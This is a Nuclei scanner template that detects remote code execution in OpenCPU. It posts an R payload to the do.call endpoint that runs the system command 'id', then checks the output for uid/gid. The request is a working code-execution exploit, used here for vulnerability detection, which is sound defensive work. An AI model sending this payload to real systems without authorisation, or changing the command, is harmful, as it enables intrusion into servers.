nuclei-templates/vulnerabilities/opencpu/opencpu-rce.yaml

46 lines
921 B
YAML

id: opencpu-rce
info:
name: OpenCPU - Remote Code Execution
author: wa1tf0rme
severity: critical
description: |
Check for remote code execution via OpenCPU was conducted.
reference:
- https://pulsesecurity.co.nz/articles/R-Shells
- https://github.com/opencpu/opencpu/
tags: rce,opencpu,oss
requests:
- method: POST
path:
- "{{BaseURL}}/ocpu/library/base/R/do.call/json"
body: |
what=function(x){ return(system(paste('id'), intern %3d T))}&args={}
headers:
Content-Type: application/x-www-form-urlencoded
max-redirects: 2
redirects: true
matchers-condition: and
matchers:
- type: word
words:
- uid=
- gid=
condition: and
- type: status
status:
- 201
extractors:
- type: regex
group: 1
regex:
- \(([a-z-]+)\)
# Enhanced by md on 2023/03/23